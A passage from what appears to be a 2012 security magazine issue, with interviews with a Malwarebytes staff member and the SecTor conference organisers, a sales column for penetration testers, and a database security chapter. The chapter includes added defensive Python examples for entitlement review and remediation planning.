If I were to educate my employees about malware, how do I go about doing that and what is the most effective form of education?
Unfortunately, all it takes is one weak link – so it’s pretty difficult to make sure your organization is watertight. I think companies need to write a solid Internet use policy and share this with employees, making sure they have understood it properly. Many people are scared to admit if they don’t understand something. The next best thing you can do is make sure people update their antivirus software, and definitely download Malwarebytes Anti-Malware!

A while ago you mentioned malware in a bar code. How do you or your team discover such new forms of malware?
This was more of a proof-of-concept than reality. It’s hard to discover this type of malware without going around and scanning every barcode in sight. However, you can imagine someone creating a QR code that takes you to a malicious site and then distributing that on printed materials.

What are some of your hobbies and interests outside IT security?
I love aviation, in fact I just received my pilot’s license. I still enjoy programming, though the development team doesn’t like me meddling in their code.

Are you a regular at the Polar Plunge?
This was something my friends begged me to do back in college. It’s been a few years since and I keep coming back for more. This year, the Malwarebytes team helped me raise hundreds of dollars for the Special Olympics!

Interview done by Aby Rao


CONFERENCE


It Is All About the Content
SecTor Conference

SecTor, the brainchild of the founders of TASK, North America’s largest IT security user group, started out of the simple desire to bring a security event north of the United States’ border. Now led by an impressive advisory committee composed of leading industry experts, the conference is preparing for its 6th annual event coming this October. Offering a technical and a management track, as well as a remarkable roster of keynote speakers, it is fair to say that SecTor is well on its way to cementing itself as Canada’s premier IT security conference.

M.A. Hervieux: What is your selection process for speakers? Are there topics you favour?
Sector: SecTor is all about the content, topics and challenges that matter to Canadian IT Security Professionals today. Of course, we’ll have fun and celebrate having the world’s best in Toronto, but the key to SecTor’s success, and thus the primary objective of the Management Committee and Advisory Committee, is quality content and presentation for attendees. Preference is given to speakers who can present new and innovative content to a broad audience. Of course, all presentations are expected to challenge the brightest and quickest of attendees – we wouldn’t have it any other way.

What topics do you feel are not a good match with SecTor? Have you declined speakers based on content you were uncomfortable with presenting?
Sector: SecTor is not a vendor focused sales fair. Consequently, there is very little tolerance for commercial content within presentations. Attendees will be encouraged to quell any shameless marketing that is not immediately backed up with rationale for its inclusion. The vendors that participate in SecTor year upon year are there to connect with the right people from the Canadian security community – you. We consistently are given feedback by vendors and attendees alike about the value of participation in SecTor and we are keen to maintain that balance.

What topics/speakers are you particularly excited about this year?
Sector: We are excited about our keynotes this year, in particular Kellman Meghu, the local Head of Security Engineering (Canada and Central US) for Check Point Software Technologies Inc. Kellman’s topic ‘How not to do security: Lessons learned from the Galactic Empire’ (http://www.sector.ca/sessions.htm#Kellman Meghu) will be both entertaining and full of important security policy and procedure tips. Also exciting, IPv6 Security by Fernando Gont which will focus on the recent advances in IPv6 security. We also have a great lineup already confirmed including topics such as Cybersecurity, Cybercrime, Forensics, Mobile security and BYOD. SecTor deliberately does not publish a full schedule until just before the conference as our goal is to provide the latest and greatest. Often the feedback we get from attendees is that there is just so much great content to choose from. That is why we also record the sessions and make them available afterwards. Previous sessions can be found at http://www.sector.ca/presentations.

What is your favourite talk of all time?
Sector: Johnny Long’s Hacking Hollywood talk in our first year – as a professional hacker by trade, a pirate by blood, a ninja in training, a security researcher and author, Johnny brought humour and insight to daily security concerns that are easily overlooked yet could potentially ruin your financial and personal records. He brought it down to a level that anyone could understand and used real-world examples such as the info captured from your parking pass, to your garbage/recycling. In subsequent years Johnny has come back to SecTor and shared the work he and others are doing in Uganda and Kenya to help bring technology in to schools. Our attendees have time and again proven to be very generous in helping support our chosen charities.

What is your favourite security news item of 2012?
Sector: 2012 has seen numerous, very public security issues already. Many of them focused around Cybersecurity through persistent attacks by determined adversaries, as well as malware in mobile applications.

However, a member of the local security community, Byron Sonne, was back in the headlines recently after being acquitted on all charges levelled after the G20 in 2010. One of the opportunities of conferences such as SecTor is to provide a forum for people to bring to the fore threats, challenges and indeed successes in the security world.

How do you perceive the current trends in security? Where would you like the focus to shift?
Sector: The industry has talked for years about a “Defense in Depth” approach to layered security. There is slowly becoming a mindset change from how to stop breaches from occurring towards a realization that bad things can and will happen. The shift is towards what companies do when there is a breach to contain things like information leakage as well as provide clear, timely and transparent communications to customers. This has been demonstrated time and again in recent years, especially where Cloud services are concerned, that companies are often remembered not for what happened, but for how a company handled the incident. Ultimately not having good response (as well as proactive security) practices can erode confidence in the company as well as technology as a whole.

How is SecTor helping to accomplish these goals?
Sector: By bringing the world’s leading speakers and researchers to Toronto, we address many of today’s security trends and concerns. Our sponsors are pushed to bring their technical team to the conference, not wear their sales hats, but truly address these trends. Our demo labs and hands on booths help provide a truly unique experience for attendees.

On our website you’ll notice that many of our sessions aren’t announced until right before the conference – we do this with the goal in mind that especially in technology, security trends change daily and we don’t want to present material that doesn’t address this constant change. You know that when you come to SecTor, you’ll be introduced to the security concerns that are affecting businesses today and tomorrow.

How do you perceive Toronto in the security market? Is the security community in Toronto leaders in certain area of the industry? What would you like to see change?
Sector: Toronto (and Canada in general) has an enormous amount to offer the world and already plays a significant role on the global stage, from the work that is undertaken on Cybersecurity at the University of Toronto Center for Global Security Studies and the Citizen Lab to the participation of the Canadian Government and private sectors in cybersecurity collaboration and awareness activities.

One area of potential growth is towards greater public / private collaboration. This year the RCMP’s Dave Black will be returning to SecTor to discuss this topic among other things. Toronto has a significant presence within the international financial sector and continues to actively participate in SecTor each year, helping to further underline their commitment to security.

You offer both a technical and a management track. If you had to pick one, which would you say draws the most attention? Do you think this is representative of the industry?
Sector: The majority of our audience is technical first, and the four (4) technical tracks we run reflect this as our primary focus. Management tracks were added in 2008, to reflect a growing interest, concern and accountability from executives. We track attendance in all our sessions and are often pleasantly surprised to find all sessions are well attended – the content is just that good. Many people who come to SecTor have a wide range of interests and IT responsibilities. Our approach to content reflects the consistent feedback we get from our attendees and vendors alike by providing real value for coming to SecTor.

If I was indecisive about attending, how would you sell me on the idea that SecTor is the conference for me?
Sector: SecTor features keynotes from North America’s most respected and trusted experts and is a must-attend event for every IT Professional. Speakers are true security professionals with depth of understanding on topics that matter. The conference is a great way to come and learn about the latest and greatest in security within a friendly environment, while gaining practical knowledge to help you every day.

SecTor
October 1-3, Toronto, Canada
http://sector.ca/default.htm

Interview done by M. A. Hervieux

M.A. HERVIEUX
M.A. Hervieux is a CISSP currently employed by one of Canada’s top Telecommunication companies. Deeply passionate about security, he devotes his spare time to pursuing reverse engineering, malware research and a growing addiction to IT certifications.

PAIN PILL


As a technologist I avoid selling. As a business owner I live and die by selling. In the movie Glengarry Glen Ross, the character Blake is this brutal, successful guy who rips into all the other salesmen. The movie is really depressing; it is about doing anything to get a sale. Blake says one thing that has stuck with me all these years. “A-B-C. A-Always, B-Be, C-Closing. Always be closing, always be closing.” I take the good and leave the bad. What I take away: You may think you are not a salesperson, but you better learn to be one or your butt will be out on the street. You better get good at it, because your organization needs to know what the next opportunity is now. Who is better than you to see where the customer needs are?

It happened to me at a large firm. They sent me in to teach a simple one-day course. As I was getting to know the students, I started asking questions about why they were there. It turned out that the one-day course turned into a week, and that turned into four weeks. The sales person assumed they needed a one-day and sold it. He never asked what they needed tomorrow or the next day.

It is not enough to perform the service of pen testing; you must be looking for the opportunity to sell more of your services to the same customer.

You are looking to satisfy as many of their needs as you can: Sell more penetration testing, security services, consulting, anything that is a fit between you and the client. It may be that you need to wait until next year to get the additional business.

I have waited as many as five years for the client to get it together to choose the next service. But he remembered. What was amazing was he replied to my follow-up email that he kept from FIVE YEARS earlier.

So I have told you what to do; now I need to tell you how to do it.

Cold Call vs. Hot Lead
The big difference between what you are doing and what a salesperson does is cold calls versus hot leads. Cold calling is lead creation from nothing. It is walking up to a stranger and convincing them to buy. A hot lead is leveraging preexisting relationships and meetings. Cold calling is when you want the customer, and a hot lead is when the customer wants you. It is much easier when the customer wants you. They are willing to listen. You already have their attention. You typically have a check or paid invoice. So there is no billing, partnering, negotiating, or political reason for them NOT to buy.

Selling Services of Penetration Testing
As you are doing your test, you ARE doing the sales activity. Your task is difficult because you sell an intangible – you are selling TRUST. You are saying, “Please trust us enough to attack your network.” What is worse, is you can lose trust in the blink of an eye. Don’t blink. Don’t abuse that trust. Eventually you will get the sale.


Salespeople overcome those objections and reasons not to buy. You are not a salesperson, but you can help the salesperson. Then you get to keep doing what you love and sales people will start sending you gifts.

If you are any kind of a technologist, you typically do not have the social skills to do cold calls on a regular basis. Make no mistake, you are not a salesperson unless you cold call as a part of your daily routine. If you think you do not need the salesperson, try doing cold calls, two per day for 30 days. If you make it to day 29 and that phone doesn’t feel like it weighs 100 kilos, change to sales. If you don’t understand how a phone would weigh 100 kilos, I suggest you ask a salesperson.

If you do make it through 30 days, now multiply that effort by 100. That is what a salesperson does for you. You can help with hot lead detection; you probably should not be cold calling.

Sales 101 – relationship building
In order to sell you must build a positive relationship with someone. I have heard that many potential customers will do a social or sports activity to see how the salesperson reacts in a stressful situation. The theory is if they are a jerk on the golf course, they are going to be the same when writing the deal. Past that stage, be careful: you are trading on the relationship that the salesperson has built.

You start by interacting. Professionalism and friendliness are your watch words. In your case the salesperson should have handed this person off in a formal manner such as an introduction or meeting. You can crush the next sale by being a pain. Being good at what you do is not enough.

If you are not good at interacting, learn personality types and know what motivates those personality types. Learn your personality type. Practice with the salesperson or your family. Know how to give a true compliment. Seek to understand, then be understood. There are many books on this.

Social media is not an interaction
Social media does not get you a relationship. Social media is marketing. No amount of posting to a forum is going to convince someone to buy a service. They may take something for free. They may attend your webinar. Social media may convince someone to buy a product, but not a service. In the near future this may change.

Fast forward
This is where we skip over the basics of leads, marketing, sales funnels, customer relationship management and how to connect with a new customer. I did not want to leave this out entirely because non-salespeople take these activities for granted. All of this is very important, but we are way past that. You have the first sale. You are trying to get the second sale or pave the way for the salesperson.

You are selling a high risk service
You are selling an intangible. Products are tangibles. If they can see it or touch it, they do not need to worry about risk. If the customer does not like a product, they can return it. There are strict laws around tangibles. Services are a completely different story. That is why the contracts for penetration tests are much more detailed.

You cannot show someone what a penetration test looks like or what the result is going to be. They may ask you for a past report. They may know your general process. This is where the risk of a service causes problems with a sale. They may have other expectations. You should confirm their expectations. Let them talk. This is the same way you build a relationship.

On the other side, you do not want to give your service away. In some cases it is very easy to do what you do if you have years of experience. Knowing when to push the right button at the right time looks easy to an outsider. Your service must have value. The risk of someone else doing this who is not as knowledgeable as you breeds doubt in the customer’s mind. That doubt translates to risk. A known level of risk that has been accepted is a good thing for your next service you offer. There is a linking from one service to another. This linking is to your advantage in your sale. Sometimes this linking is misnamed as customer loyalty. They are not loyal, they are risk averse.

PAINPILL

Page 54 http://pentestmag.com 08/2012 (16) August

You are selling trust

It is very difficult to gain the trust of an organization. This is especially true for penetration testing. You are saying, “Please trust us enough to attack your network.” Trust is your most valuable asset. Not knowledge. Not skill. Not technology.

I just had a discussion with a customer that I really like. She is well versed in security and she is a really good person. We have done other business together and now she asked me to do a test for her. In our first conversation she told me that it was very important that I knew that she was choosing me because she trusted me. It makes me extra vigilant. The other vendor may have more skill than me, but I have the job.

I have another customer who is going to let me do something I have never done before because he trusts me. He knows that I will protect his assets from harm. Think about it. I am going to do something that is innately harmful, that I have never done before, and he is paying me to do it. Why? Because he knows I will always do the right thing for his company.

What is worse is you can lose trust in the blink of an eye. Don’t blink. Don’t abuse that trust. Favor the lack of a sale and the gain of trust every day. Eventually you will get the sale. It may take years. This is a mistake new salespeople make all the time. They treat the customer like toilet paper.

Still don’t know how to sell?

As you are doing your test, you ARE doing the sales activity. You are paying attention to what the network looks like. Seeing where the weaknesses are located. Knowing that certain assets are outside the scope gives you power to suggest that the next scope or the next project include that asset. Knowing that you could get in the other way means there is more to do the next time.

Take careful notes on all these out-of-scope items. These are your hot buttons for next time. There is the sale. How you bring that information to the customer’s attention is the close.

The Close

If you have never done this before, practice with your salesperson. DO NOT screw up the sale by practicing on the customer. Remember those gifts from above? They become beatings if you lose the sale. The close is the end of the sale. People wreck the sale by getting to the end and doing too much.

The process to close is:

• Ask questions that the client can answer.
• Put them in an uncomfortable position of knowing they have a problem.
• Show them they need a service and they have a problem.
• SHUT UP! WAIT for them to ask you how to solve this problem.
• Wait for it… Wait for it… They will ask.
• Let them know that you have a solution, NOT what the solution is.
• If they buy your solution, you will solve the problem.

As technologists we see problems and we want to solve them. You lose if you solve the problem before getting money. This is where salespeople want to smack us. Do not tell the customer what the problem is. They need to be led to it so that they may draw their own conclusion and ask their own questions. Don’t tell the customer that you can solve the problem.

They want to know that you need to work for the answer. If they think that the solution takes no effort or time, it has no value. Do not tell the customer that you have a solution, because they will say, “tell me,” and it looks like you are withholding information. Your magic words are, “I think we can help, but I need to investigate. Investigation takes time.”

I used to think this was manipulation. It could be, but not the way I am intending here. You never wish to offend your customer by implying they have been doing business incorrectly and there is an obvious solution. Nobody wants to feel dumb. Additionally, you always wish to give yourself the time to think about your solution fully. Letting the customer know you have a solution that you wish to research is simply prudent. By letting the customer ask for help at steps 4 and 5, we respectfully let them lead.

New skills = New things to sell

The good news is penetration testing is not going away, but it may change. Your skills will grow. The customer may hire you to do this asset or that scope. Keep all those past customers in your head as you learn the new skill. When you are ready to try that new skill, follow up with the customer and tell them what you have learned and how this applies to their business.

They may not need you for that new skill, but now you have created a new conversation. Because you took the time to remember their situation in their network, you may get to do the old test over again. For example, they gave your last report to management.

Management may have lined the bottom of the birdcage with your report. But that pen test requirement has come up again, and they are thinking of you. Your new skill may translate into repeat business.

Summary

Sales is really about relationships. Relationships take time. Every interaction in a penetration test is time with the customer. The customer may not see the true flaws in their network or business process. Your investigation and communication with the customer will yield unexpected avenues that greatly benefit everyone. It is very difficult for people to change their trust to an unknown. Your job is to honor their trust, and provide good services.

Solution selling on Amazon: http://www.amazon.com/Solution-Selling-Creating-Difficult-Markets/dp/0786303158.

Glengarry, Glen Ross on IMDB: http://www.imdb.com/character/ch0012005/quotes.

DEAN [email protected]. Dean Bushmiller is a penetration tester and a trainer for the CEH, CISSP, ISSMP and ISSAP for Expanding Security. Sign up for our free weekly security Painpill: http://www.expandingsecurity.com/painpill.


Before undertaking a critical medical procedure such as an operation, doctors first focus on making a correct diagnosis. MRI and CAT scans are essential tools in the field of medical diagnostics because they are non-invasive, fast, easy to administer, relatively low cost, and they provide immediate results. For these same reasons database SRC programs should always start with a vulnerability scan (an MRI of your database, metaphorically speaking).

Because they can be deployed quickly and with minimal project effort, database vulnerability scans offer immediate time-to-benefit. As a critical control process, scanning begins to deliver value on an enterprise-wide scale as soon as it is implemented. But even more importantly, scanning offers a proactive approach to database SRC by providing critical information such as answers to the following questions:

• What is the database asset inventory?
• Which databases house sensitive data?
• What access controls are in place?
• What vulnerabilities exist?
• What remediation steps should be taken?

The stakes are high in database security, yet simple solutions exist that are easy to implement. Scanning technology establishes a program of proactive threat management and demonstrates compliance control.

Save The Database, Save The World!

Chapter 6 DEFENSIVE STRATEGY

“Ninety-six percent of breaches were avoidable through simple or intermediate controls.”


Armed proactively with critical discovery and vulnerability information, database SRC teams are able to prioritize fixes and make better decisions because they have full visibility of the remediation requirements.

Sometimes the list of database vulnerabilities revealed by a scan includes threats that are already planned for remediation at a later time, or cannot be remediated at all. In such cases, SRC best practice dictates that these vulnerabilities be monitored to establish a compensating control. For example, if we understand that privileged users represent a possible separation of duty compliance gap, we must also appreciate that it is not possible to remove all privileged users from a database. So, we must therefore monitor privileged users, but must we monitor all privileged users on all databases?

First, let us ask a more basic question: Who are the privileged users anyway? Are privileged users only those users assigned to a specific privileged role called “database administrator”? Or is a privileged user more accurately defined as any user whose privileges are excessive to his or her job role? Let’s remember that to satisfy the audit finding, we have two choices: we must either resolve the separation of duty condition or implement monitoring as a compensating control. It stands to reason that fixing vulnerabilities is preferable to implementing and managing an ongoing compensating control such as database activity monitoring. The preferred approach to managing privileged users, therefore, is to first scan all user entitlements to determine a baseline of the existing privilege assignments. Next, an entitlement review process should be run to establish desired user rights based on least privilege. Finally, the entitlement review process should provide attestation for all users, especially those users who will be granted privileged account status. Once a list of authorized privileged users is established, the excessive privileges of all other users should be revoked. In this way the monitoring scope is reduced and becomes more manageable. A database vulnerability and user rights scan not only establishes a higher level of protection, it also helps filter the monitoring scope and reduce performance overhead. When database SRC starts with a scan, organizations save time, expenses, and computing resources.
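The entitlement review described above, carried through as an added example that is not the chapter's own code: a Python pass over a constructed user-rights scan that baselines the scanned grants, applies an assumed least-privilege baseline per job role and an attestation list, produces the revocations, and returns the reduced monitoring scope. The instance names, users, roles and privilege names are all constructed for the example.

```python
"""Entitlement review and monitoring-scope reduction after a user-rights scan.

Added example, not code from the chapter. The scan output, the role
baseline and the attestation list are constructed; a real review would
load the grants a scanner collected from each instance.
"""
from __future__ import annotations
from dataclasses import dataclass, field

# Grants that make an account "privileged" in the chapter's sense:
# administrative power over the instance rather than ordinary data access.
PRIVILEGED = {"SUPERUSER", "CREATE USER", "GRANT ANY", "ALTER SYSTEM"}

# Least-privilege baseline per job role (assumed policy for this example).
ROLE_RIGHTS = {
    "dba": PRIVILEGED | {"SELECT", "INSERT", "UPDATE", "DELETE"},
    "app": {"SELECT", "INSERT", "UPDATE", "DELETE"},
    "analyst": {"SELECT"},
    "developer": {"SELECT"},
}


@dataclass
class ScannedUser:
    instance: str      # database instance the scanner read
    name: str
    job_role: str      # from the HR/role directory, not from the database
    grants: set[str]   # privileges the scanner found granted


@dataclass
class ReviewResult:
    # (instance, user) -> grants to revoke in the Fix step
    revocations: dict[tuple[str, str], set[str]] = field(default_factory=dict)
    # privileged accounts that survive the review and must be monitored
    monitoring_scope: set[tuple[str, str]] = field(default_factory=set)
    # privileged accounts nobody attested: flagged, then stripped
    unattested_privileged: set[tuple[str, str]] = field(default_factory=set)


def review_entitlements(scan: list[ScannedUser],
                        attested: set[tuple[str, str]]) -> ReviewResult:
    """Compare each scanned account with its role baseline and attestation."""
    result = ReviewResult()
    for u in scan:
        key = (u.instance, u.name)
        allowed = ROLE_RIGHTS.get(u.job_role, set())   # unknown role: no rights
        excessive = u.grants - allowed
        if u.grants & PRIVILEGED and key not in attested:
            # Privileged status without attestation is itself a finding: the
            # privileged grants are revoked even where the role would allow them.
            result.unattested_privileged.add(key)
            excessive |= u.grants & PRIVILEGED
        if excessive:
            result.revocations[key] = excessive
        if (u.grants - excessive) & PRIVILEGED:
            result.monitoring_scope.add(key)   # attested privileged account
    return result


def revoke_statements(result: ReviewResult) -> list[str]:
    """Render the Fix step as REVOKE statements (generic SQL; adapt per platform)."""
    return [f"-- {inst}\nREVOKE {', '.join(sorted(grants))} FROM {user};"
            for (inst, user), grants in sorted(result.revocations.items())]


# Constructed scan output for two instances.
SCAN = [
    ScannedUser("hr-prod", "alice", "dba", {"SUPERUSER", "CREATE USER", "SELECT"}),
    ScannedUser("hr-prod", "bob", "developer", {"SELECT", "UPDATE", "SUPERUSER"}),
    ScannedUser("hr-prod", "carol", "app", {"SELECT", "INSERT", "UPDATE", "DELETE"}),
    ScannedUser("crm-dev", "dave", "dba", {"SUPERUSER", "GRANT ANY"}),
    ScannedUser("crm-dev", "erin", "analyst", {"SELECT", "DELETE"}),
]
# Only alice's privileged account on hr-prod was attested by the data owner.
ATTESTED = {("hr-prod", "alice")}

if __name__ == "__main__":
    r = review_entitlements(SCAN, ATTESTED)
    print("monitoring scope:", sorted(r.monitoring_scope))
    print("unattested privileged:", sorted(r.unattested_privileged))
    print("\n".join(revoke_statements(r)))
```

Of five scanned accounts only the attested DBA remains in the monitoring scope; the unattested superuser grants and the analyst's DELETE are queued for revocation.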

The Agentless Manifesto

As organizations establish programs for database SRC, the ability to scale control processes across the enterprise quickly emerges as a number one success factor. But scaling infrastructure projects enterprise wide can challenge even the most steadfast IT teams. A database is only as secure as its weakest link, and organizations realize that project scopes must include all databases across the enterprise to deliver security and compliance controls that are complete. Again, just as it makes no sense to lock the front door and leave the back door open, organizations must not only lock down critical databases (such as SOX-designated instances), but also non-critical database instances where database links offer back door access to sensitive information.

Figure 1. Agentless Database SRC Architecture

For smaller companies with fewer database instances to protect, IT resources are still scarce, so any project must scale fast through implementation and be easy to manage and service down the road. Large organizations managing thousands of database instances are concerned over partial deployment outcomes, performance impacts on mission-critical systems, and the complexity of managing thousands of endpoints. Most CIOs, having learned hard lessons through other challenging enterprise-wide deployments, seek assurance that successful project outcomes will be achieved on time and within budget. Project success is often recognized by the quickest time-to-value, the lowest total cost of ownership (TCO), and the most rapid return on investment (ROI).

Agentless architectures are defined as software deployments where no foreign or third-party software is installed on the endpoint locations, or in the case of database SRC, installed on the database hosts. Such architectures are intrinsically more scalable, manageable, and serviceable as the entire solution can be deployed on the smallest possible footprint, such as a single server. Agentless architectures do not require multiple database SRC appliances to achieve security and compliance results. Agentless deployments enable enterprise-wide scopes to be brought live in the shortest possible timeframes and with smaller teams. Furthermore, agentless deployments mean security and compliance controls start delivering value as soon as the go-live deployment occurs. Total cost of ownership (TCO) and return on investment (ROI) advantages are obvious, since SRC project teams only need to manage a single software deployment as opposed to tens, hundreds, or even thousands of individual agents.

Database scanning is an agentless architecture which features a light-weight infrastructure footprint reducing the cost and complexity of implementation. The impact of agentless scanning on mission critical systems is low because no foreign software is installed or maintained. DBAs benefit from less risk to database performance and reduced maintenance requirements.

Agent-based approaches, on the other hand, require the deployment and management of foreign software over the long term. Such architectures require not only one-off installation, but also ongoing maintenance, patch management, and performance tuning to minimize the impact on production systems. By way of example, most database activity monitoring (DAM) solutions require the installation of software agents either on the database host itself, or on the network supporting the database. As we have discussed, while quite effective at monitoring SQL traffic, these agents also generate network and database activity of their own. If not managed closely, such overhead can impact database and network performance. Consequently, DAM solutions must be deployed and managed carefully so they are able to scale across the enterprise.

To manage the performance concerns of DAM deployments, and to help them scale, database administrators seek to filter and minimize the monitoring scope. No matter if the monitoring activity is host or network based, less monitoring means less network traffic and less data to manage overall. Vulnerability scanning provides the intelligence needed to effectively filter and target database activity monitoring scopes. Through an agentless vulnerability scan conducted upstream from the monitoring process, known threats can be identified and remediated proactively. By filtering and reducing the scope of monitoring, vulnerability scanning is able to reduce the cost and complexity of enterprise database activity monitoring.

For most organizations, the forensic audit capabilities of DAM are a necessary requirement and important compensating control for known vulnerabilities such as privileged users. Well-architected and properly deployed DAM systems may also offer real-time intrusion detection systems (IDS). But why operate in reactive mode at all? Why wait for a breach or control violation to occur, only to report about it after the fact? Doesn’t it make more sense to identify and remediate threats in the first place?

Database SRC starts with an agentless scan because it enables proactive remediation of vulnerabilities and reduces monitoring scope. As opposed to more intrusive agent-based approaches, agentless architectures provide DBA stakeholders improved stability and serviceability over mission-critical systems. Database applications may be upgraded and patched regardless of foreign agent dependencies, and organizations are better able to service their critical applications. This operational autonomy not only improves reliability, availability, and serviceability, it represents best practice for the management of mission-critical applications.

Database SRC Life Cycle Best Practices

Best practices are all about completeness. Scanning, monitoring, and data encryption – while necessary and critical elements of a best practice approach – are, by themselves, only table-stake capabilities, and they are insufficient when deployed separately or alone. All tier one database platforms today offer data encryption capabilities as a built-in feature. Whether encryption is implemented while data is “at rest” or “in motion” is the function of an effective policy management program. As with securing other critical infrastructure elements, organizations seeking to achieve best practice in database SRC should commit to a full life cycle approach to achieve truly reliable protection. The database SRC lifecycle is a continuous program that involves an iterative process of discovery, policy management, vulnerability assessment, user entitlement review, prioritization of fixes, remediation, monitoring of known vulnerabilities, and finally, deep reporting and analytics of the entire life cycle.

Practitioners generally agree on the following six phase best practices approach to manage the database SRC life cycle (Figure 2).

Discover

Create and describe the database asset inventory. Where are the databases located? What kind of databases are they? Who owns each database, and who is responsible for managing them? Which databases store sensitive data? What types of sensitive data are in the inventory?

Classify

Establish classifications for corporate data. Catalogue and develop a baseline to manage database assets through policies for protection. Set appropriate rules and controls for managing sensitive data. Establish and document the database SRC plan.

Assess

Identify all vulnerabilities which are present according to protection policies. Review user rights and data access profiles. Determine password strengths and weaknesses. Are the database configurations secured against known vulnerabilities? Have necessary patches been applied?

Prioritize

Based on assessment data and asset classification, segment vulnerabilities into high, medium, and low priority. Establish ongoing plans for remediation.

Fix

Execute remediation tasks against the prioritized list of vulnerabilities. Strengthen passwords, revoke excessive privileges, fix configurations, and close patch gaps.

Monitor

Monitor all known vulnerabilities such as privileged user activity, and watch unpatched systems. Alert on suspicious or malicious activity.

Report

Create evidentiary reporting and audit trails to establish an SRC profile of the database inventory. Prepare specific reporting to satisfy individual compliance guidelines such as SOX and PCI DSS.
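The six phases above carried through one cycle in code, as an added example that is not from the chapter: a constructed inventory and set of findings are prioritized by data classification and severity, split into Fix tasks and Monitor rules (the compensating-control case for findings that cannot be fixed now), checked for instances that were discovered but never assessed, and summarised into a per-database SRC profile for the Report phase. The weights, thresholds, instance names and findings are assumptions made for the example.

```python
"""One pass of the database SRC life cycle: Prioritize, Fix, Monitor, Report.

Added example, not code from the chapter. The inventory, classifications and
findings are constructed; the weights and thresholds are an assumed policy.
"""
from __future__ import annotations

# Classify: weight of each data classification (assumed policy).
CLASS_WEIGHT = {"sensitive": 3, "internal": 2, "public": 1}
# Assess: weight of each finding severity (assumed policy).
SEV_WEIGHT = {"high": 3, "medium": 2, "low": 1}
ORDER = {"high": 0, "medium": 1, "low": 2}

# Discover + Classify: constructed inventory. 'new-analytics' was discovered
# this cycle and has not been assessed yet.
INVENTORY = {
    "hr-prod": {"owner": "hr-dba-team", "classification": "sensitive"},
    "crm-prod": {"owner": "sales-it", "classification": "sensitive"},
    "crm-dev": {"owner": "sales-it", "classification": "internal"},
    "wiki-db": {"owner": "it-ops", "classification": "public"},
    "new-analytics": {"owner": "bi-team", "classification": "sensitive"},
}
ASSESSED = {"hr-prod", "crm-prod", "crm-dev", "wiki-db"}

# Assess: constructed findings. fixable=False marks the chapter's
# "planned for later / cannot be remediated" case.
FINDINGS = [
    {"db": "hr-prod", "check": "default password on an administrative account",
     "severity": "high", "fixable": True},
    {"db": "hr-prod", "check": "three privileged users (separation of duty gap)",
     "severity": "medium", "fixable": False},
    {"db": "crm-dev", "check": "database link into crm-prod with stored credentials",
     "severity": "high", "fixable": True},
    {"db": "wiki-db", "check": "vendor patch missing",
     "severity": "medium", "fixable": True},
    {"db": "crm-prod", "check": "verbose error messages expose schema names",
     "severity": "low", "fixable": True},
]


def priority(classification: str, severity: str) -> str:
    """Prioritize: segment by a classification x severity score."""
    score = CLASS_WEIGHT[classification] * SEV_WEIGHT[severity]
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"


def plan_cycle(inventory: dict, findings: list[dict]) -> dict:
    """Split findings into Fix tasks (highest priority first) and Monitor
    rules: findings that cannot be fixed now become compensating controls."""
    fix, monitor = [], []
    for f in findings:
        asset = inventory[f["db"]]
        item = {**f, "priority": priority(asset["classification"], f["severity"]),
                "owner": asset["owner"]}
        (fix if f["fixable"] else monitor).append(item)
    fix.sort(key=lambda i: ORDER[i["priority"]])   # stable: scan order within a tier
    return {"fix": fix, "monitor": monitor}


def unassessed(inventory: dict, assessed: set[str]) -> list[str]:
    """Discover is iterative: instances in the current inventory that were
    never assessed must enter the next Assess phase."""
    return sorted(db for db in inventory if db not in assessed)


def report(inventory: dict, plan: dict, assessed: set[str]) -> dict:
    """Report: SRC profile per database, the evidentiary record for an audit."""
    profile = {
        db: {"owner": a["owner"], "classification": a["classification"],
             "assessed": db in assessed, "open_fixes": 0, "high_fixes": 0,
             "monitored": 0}
        for db, a in inventory.items()
    }
    for i in plan["fix"]:
        profile[i["db"]]["open_fixes"] += 1
        if i["priority"] == "high":
            profile[i["db"]]["high_fixes"] += 1
    for i in plan["monitor"]:
        profile[i["db"]]["monitored"] += 1
    return profile


if __name__ == "__main__":
    plan = plan_cycle(INVENTORY, FINDINGS)
    for i in plan["fix"]:
        print(f"FIX     [{i['priority']:6}] {i['db']:14} {i['check']} (owner: {i['owner']})")
    for i in plan["monitor"]:
        print(f"MONITOR [{i['priority']:6}] {i['db']:14} {i['check']}")
    print("not yet assessed:", unassessed(INVENTORY, ASSESSED))
    for db, p in report(INVENTORY, plan, ASSESSED).items():
        print(db, p)
```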

For completeness, database SRC best practices must include all phases of the life cycle, and the process must be iterative. Completeness means assessment targets must be derived from a thorough discovery process, and monitoring rules must be based on documented policies. And because the database asset inventory is continually evolving as new instances are added, updated, and deleted at any moment, the best practice life cycle must be executed iteratively and on an ongoing basis.

Figure 2. The database SRC life cycle best practice methodology

Continuous Compliance

Today’s business operates in a compliance driven regulatory environment, and IT organizations have learned that successful auditor/enterprise relationships require adherence to compliance regulations. Fortunately, many of the best practices that organizations deploy to achieve database security also reduce corporate risk and improve database compliance. What’s more, database security grounds compliance where the data lives – in the database.

However, organizations often operate in reactive mode, awaiting the discovery of a control violation or an audit finding before taking action. As soon as the audit finding has unleashed chaos and gained management attention, the organization scrambles teams to close the gap. While such a reactive approach may deliver results after the fact, it also increases the cost of compliance and is disruptive to the organization. The obvious question is this: Why aren’t organizations more proactive? Why wait to learn that the databases are not only out of compliance, but also unprotected? Shouldn’t we take proactive steps to avoid the train wreck, as opposed to scrambling first responder teams to pick up the pieces?

The goal must be to establish a control framework offering continuous compliance. Continuous compliance implies an inherently disciplined system based on best practices where documented controls, policy driven processes, reporting, and ongoing improvements are a standard operating procedure. In such an environment, organizations have established a framework of proactive measures that offers the best possible means of prevention. But since we recognize that no security system is impenetrable, continuous compliance enables organizations to master the basic control processes required to flag violations and intrinsically answer the four most basic forensic questions:

• What happened?
• How did it happen?
• Who did it?
• When did they do it?

In addition to being persistent and able to demonstrate compliance on demand, a system of continuous compliance must be proactive. Rather than allow an audit to unleash chaos, organizations have a significant opportunity to operate more productively and with less disruption. By establishing a proactive control framework, continuous compliance reduces corporate risk overall.

In a continuous compliance environment the audit focus moves away from the SRC status of a single database instance and towards the effectiveness of the database SRC control program overall. Rather than drilling into the rights management status of a particular database or the compensating controls placed over certain privileged users, the audit objective is primarily to determine if the database SRC control program is deployed properly and operating as intended.

